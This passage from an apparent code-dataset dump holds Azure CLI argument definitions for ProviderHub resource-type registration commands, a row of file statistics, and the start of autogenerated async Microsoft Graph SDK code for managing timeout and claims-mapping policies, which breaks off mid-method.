help='The OpenAPI (swagger specs) of the resource type. RPaaS will use the swagger specs to validate http requests/responses.')
c.argument('allowed_unauthorized_actions', nargs='+',
help='The allowed unauthorized actions.')
c.argument('authorization_action_mappings', action=AddAuthorizationActionMappings,
nargs='+', help='Allows RP to override action verb for RBAC purposes at ARM.')
c.argument('linked_access_checks', action=AddLinkedAccessChecks, nargs='+',
help='Enables additional Role Based Access Control (RBAC) checks on related resources.')
c.argument('default_api_version', type=str,
help='The default API version for the endpoint.')
c.argument('logging_rules', type=AddLoggingRules,
help='Enables additional event logs RP wants customers to see in their subscription for a particular action.')
c.argument('throttling_rules', action=AddThrottlingRules, nargs='+',
help='Allows RPs to set individual limits for different actions in terms of number of requests or number of resources (for collection read requests only).')
c.argument('required_features', action=AddRequiredFeatures, nargs='+',
help='If specified, only subscriptions registered to the corresponding feature flag will be allowed.')
c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flag will be allowed.', arg_group='Features '
'Rule')
c.argument('enable_async_operation', arg_type=get_three_state_flag(
), help='Indicates whether the async operation is enabled for this resource type.')
c.argument('enable_third_party_s2s', arg_type=get_three_state_flag(
), help='Indicates whether to enable third party s2s.')
c.argument('is_pure_proxy', arg_type=get_three_state_flag(),
help='Indicates whether this is a "PureProxy" resource type.')
c.argument('identity_management', action=AddIdentityManagement, nargs='+',
help='MSI related settings. RPaaS supports Managed Identity and can help simplify the onboarding process.')
c.argument('check_name_availability_specifications', action=AddCheckNameAvailabilitySpecifications, nargs='+',
help='RPaaS provides this feature at the platform level to help UserRPs with name availability checks without calling into the POST extension endpoints for the "checkNameAvailability" resource type.')
c.argument('disallowed_action_verbs', nargs='+',
help='The supported values are "read", "write", "delete", "action". This setting will block all operations of the specified type on the resource type. These actions map to the corresponding HTTP verbs.')
c.argument('service_tree_infos', action=AddResourcetyperegistrationServiceTreeInfos,
nargs='+', help='The ServiceTree information for the resource provider.')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
c.argument('subscription_state_rules', action=AddSubscriptionStateRules,
nargs='+', help='The subscription policy.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('extended_locations', action=AddExtendedLocations,
nargs='+', help='The extended locations property.')
c.argument('resource_move_policy', action=AddResourceMovePolicy, nargs='+',
help='Indicates the resource type has opted in to move operations.')
c.argument('resource_deletion_policy', arg_type=get_enum_type(['NotSpecified', 'CascadeDeleteAll',
'CascadeDeleteProxyOnlyChildren']), help='The property to customize RPaaS deletion operation.')
with self.argument_context('providerhub resource-type-registration update') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('resource_type', type=str, help='The resource type.')
c.argument('routing_type', arg_type=get_enum_type(['Default', 'ProxyOnly', 'HostBased', 'Extension',
'Tenant', 'Fanout', 'LocationBased', 'Failover',
'CascadeExtension']), help='The resource routing type.')
c.argument('regionality', arg_type=get_enum_type(
['NotSpecified', 'Global', 'Regional']), help='The regionality of the resource type.')
c.argument('endpoints', action=AddResourceTypeEndpointProperties, nargs='+', help='The resource '
'type endpoint properties.')
c.argument('resource_creation_begin', action=AddResourceCreationBegin, nargs='+',
help='Extension options for handling the resource creation begin extension request.')
c.argument('resource_patch_begin', action=AddResourcePatchBegin, nargs='+',
help='Extension options for handling the resource patch begin extension request.')
c.argument('marketplace_type', arg_type=get_enum_type(
['NotSpecified', 'AddOn', 'Bypass', 'Store']), help='The resource type behavior in the marketplace.')
c.argument('swagger_specifications', action=AddSwaggerSpecifications, nargs='+',
help='The OpenAPI (swagger specs) of the resource type. RPaaS will use the swagger specs to validate http requests/responses.')
c.argument('allowed_unauthorized_actions', nargs='+',
help='The allowed unauthorized actions.')
c.argument('authorization_action_mappings', action=AddAuthorizationActionMappings,
nargs='+', help='Allows RP to override action verb for RBAC purposes at ARM.')
c.argument('linked_access_checks', action=AddLinkedAccessChecks, nargs='+',
help='Enables additional Role Based Access Control (RBAC) checks on related resources.')
c.argument('default_api_version', type=str,
help='The default API version for the endpoint.')
c.argument('logging_rules', type=AddLoggingRules,
help='Enables additional event logs RP wants customers to see in their subscription for a particular action.')
c.argument('throttling_rules', action=AddThrottlingRules, nargs='+',
help='Allows RPs to set individual limits for different actions in terms of number of requests or number of resources (for collection read requests only).')
c.argument('required_features', action=AddRequiredFeatures, nargs='+',
help='If specified, only subscriptions registered to the corresponding feature flag will be allowed.')
c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flag will be allowed.', arg_group='Features '
'Rule')
c.argument('enable_async_operation', arg_type=get_three_state_flag(
), help='Indicates whether the async operation is enabled for this resource type.')
c.argument('enable_third_party_s2s', arg_type=get_three_state_flag(
), help='Indicates whether to enable third party s2s.')
c.argument('is_pure_proxy', arg_type=get_three_state_flag(),
help='Indicates whether this is a "PureProxy" resource type.')
c.argument('identity_management', action=AddIdentityManagement, nargs='+',
help='MSI related settings. RPaaS supports Managed Identity and can help simplify the onboarding process.')
c.argument('check_name_availability_specifications', action=AddCheckNameAvailabilitySpecifications, nargs='+',
help='RPaaS provides this feature at the platform level to help UserRPs with name availability checks without calling into the POST extension endpoints for the "checkNameAvailability" resource type.')
c.argument('disallowed_action_verbs', nargs='+',
help='The supported values are "read", "write", "delete", "action". This setting will block all operations of the specified type on the resource type. These actions map to the corresponding HTTP verbs.')
c.argument('service_tree_infos', action=AddResourcetyperegistrationServiceTreeInfos,
nargs='+', help='The ServiceTree information for the resource provider.')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
c.argument('subscription_state_rules', action=AddSubscriptionStateRules,
nargs='+', help='The subscription policy.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('extended_locations', action=AddExtendedLocations,
nargs='+', help='The extended locations property.')
c.argument('resource_move_policy', action=AddResourceMovePolicy, nargs='+',
help='Indicates the resource type has opted in to move operations.')
c.argument('resource_deletion_policy', arg_type=get_enum_type(['NotSpecified', 'CascadeDeleteAll',
'CascadeDeleteProxyOnlyChildren']), help='The property to customize RPaaS deletion operation.')
with self.argument_context('providerhub resource-type-registration delete') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('resource_type', type=str,
help='The resource type.', id_part='child_name_1')
| 83.335859 | 671 | 0.671768 | 3,692 | 33,001 | 5.893283 | 0.111322 | 0.059564 | 0.0273 | 0.034746 | 0.939608 | 0.937402 | 0.930968 | 0.921868 | 0.919662 | 0.919662 | 0 | 0.0026 | 0.230841 | 33,001 | 395 | 672 | 83.546835 | 0.854588 | 0.016242 | 0 | 0.777465 | 0 | 0.053521 | 0.527518 | 0.065296 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002817 | false | 0.005634 | 0.008451 | 0 | 0.011268 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62d55559689ecca917a2f91716ecbd0fd00ba734 | 121,233 | py | Python | msgraph/cli/command_modules/identitysignins/azext_identitysignins/vendored_sdks/identitysignins/aio/operations/_policies_operations.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | msgraph/cli/command_modules/identitysignins/azext_identitysignins/vendored_sdks/identitysignins/aio/operations/_policies_operations.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | 22 | 2022-03-29T22:54:37.000Z | 2022-03-29T22:55:27.000Z | msgraph/cli/command_modules/identitysignins/azext_identitysignins/vendored_sdks/identitysignins/aio/operations/_policies_operations.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class policiesOperations:
"""policiesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~identity_sign_ins.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_activity_based_timeout_policies(
self,
orderby: Optional[List[Union[str, "models.Enum114"]]] = None,
select: Optional[List[Union[str, "models.Enum115"]]] = None,
expand: Optional[List[Union[str, "models.Enum116"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionofactivitybasedtimeoutpolicy"]:
"""Get activityBasedTimeoutPolicies from policies.
Get activityBasedTimeoutPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum114]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum115]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum116]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionofactivitybasedtimeoutpolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofactivitybasedtimeoutpolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofactivitybasedtimeoutpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_activity_based_timeout_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofactivitybasedtimeoutpolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies'} # type: ignore
async def create_activity_based_timeout_policies(
self,
body: "models.microsoftgraphactivitybasedtimeoutpolicy",
**kwargs
) -> "models.microsoftgraphactivitybasedtimeoutpolicy":
"""Create new navigation property to activityBasedTimeoutPolicies for policies.
Create new navigation property to activityBasedTimeoutPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphactivitybasedtimeoutpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphactivitybasedtimeoutpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_activity_based_timeout_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphactivitybasedtimeoutpolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphactivitybasedtimeoutpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies'} # type: ignore
async def get_activity_based_timeout_policies(
self,
activity_based_timeout_policy_id: str,
select: Optional[List[Union[str, "models.Enum117"]]] = None,
expand: Optional[List[Union[str, "models.Enum118"]]] = None,
**kwargs
) -> "models.microsoftgraphactivitybasedtimeoutpolicy":
"""Get activityBasedTimeoutPolicies from policies.
Get activityBasedTimeoutPolicies from policies.
:param activity_based_timeout_policy_id: key: id of activityBasedTimeoutPolicy.
:type activity_based_timeout_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum117]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum118]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphactivitybasedtimeoutpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphactivitybasedtimeoutpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_activity_based_timeout_policies.metadata['url'] # type: ignore
path_format_arguments = {
'activityBasedTimeoutPolicy-id': self._serialize.url("activity_based_timeout_policy_id", activity_based_timeout_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphactivitybasedtimeoutpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies/{activityBasedTimeoutPolicy-id}'} # type: ignore
async def update_activity_based_timeout_policies(
self,
activity_based_timeout_policy_id: str,
body: "models.microsoftgraphactivitybasedtimeoutpolicy",
**kwargs
) -> None:
"""Update the navigation property activityBasedTimeoutPolicies in policies.
Update the navigation property activityBasedTimeoutPolicies in policies.
:param activity_based_timeout_policy_id: key: id of activityBasedTimeoutPolicy.
:type activity_based_timeout_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphactivitybasedtimeoutpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_activity_based_timeout_policies.metadata['url'] # type: ignore
path_format_arguments = {
'activityBasedTimeoutPolicy-id': self._serialize.url("activity_based_timeout_policy_id", activity_based_timeout_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphactivitybasedtimeoutpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies/{activityBasedTimeoutPolicy-id}'} # type: ignore
async def delete_activity_based_timeout_policies(
self,
activity_based_timeout_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property activityBasedTimeoutPolicies for policies.
Delete navigation property activityBasedTimeoutPolicies for policies.
:param activity_based_timeout_policy_id: key: id of activityBasedTimeoutPolicy.
:type activity_based_timeout_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_activity_based_timeout_policies.metadata['url'] # type: ignore
path_format_arguments = {
'activityBasedTimeoutPolicy-id': self._serialize.url("activity_based_timeout_policy_id", activity_based_timeout_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_activity_based_timeout_policies.metadata = {'url': '/policies/activityBasedTimeoutPolicies/{activityBasedTimeoutPolicy-id}'} # type: ignore
def list_claims_mapping_policies(
self,
orderby: Optional[List[Union[str, "models.Enum119"]]] = None,
select: Optional[List[Union[str, "models.Enum120"]]] = None,
expand: Optional[List[Union[str, "models.Enum121"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionofclaimsmappingpolicy"]:
"""Get claimsMappingPolicies from policies.
Get claimsMappingPolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum119]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum120]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum121]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionofclaimsmappingpolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofclaimsmappingpolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofclaimsmappingpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_claims_mapping_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofclaimsmappingpolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies'} # type: ignore
async def create_claims_mapping_policies(
self,
body: "models.microsoftgraphclaimsmappingpolicy",
**kwargs
) -> "models.microsoftgraphclaimsmappingpolicy":
"""Create new navigation property to claimsMappingPolicies for policies.
Create new navigation property to claimsMappingPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphclaimsmappingpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphclaimsmappingpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_claims_mapping_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphclaimsmappingpolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphclaimsmappingpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies'} # type: ignore
async def get_claims_mapping_policies(
self,
claims_mapping_policy_id: str,
select: Optional[List[Union[str, "models.Enum122"]]] = None,
expand: Optional[List[Union[str, "models.Enum123"]]] = None,
**kwargs
) -> "models.microsoftgraphclaimsmappingpolicy":
"""Get claimsMappingPolicies from policies.
Get claimsMappingPolicies from policies.
:param claims_mapping_policy_id: key: id of claimsMappingPolicy.
:type claims_mapping_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum122]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum123]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphclaimsmappingpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphclaimsmappingpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_claims_mapping_policies.metadata['url'] # type: ignore
path_format_arguments = {
'claimsMappingPolicy-id': self._serialize.url("claims_mapping_policy_id", claims_mapping_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphclaimsmappingpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_claims_mapping_policies.metadata = {'url': '/policies/claimsMappingPolicies/{claimsMappingPolicy-id}'} # type: ignore
async def update_claims_mapping_policies(
self,
claims_mapping_policy_id: str,
body: "models.microsoftgraphclaimsmappingpolicy",
**kwargs
) -> None:
"""Update the navigation property claimsMappingPolicies in policies.
Update the navigation property claimsMappingPolicies in policies.
:param claims_mapping_policy_id: key: id of claimsMappingPolicy.
:type claims_mapping_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphclaimsmappingpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_claims_mapping_policies.metadata['url'] # type: ignore
path_format_arguments = {
'claimsMappingPolicy-id': self._serialize.url("claims_mapping_policy_id", claims_mapping_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphclaimsmappingpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
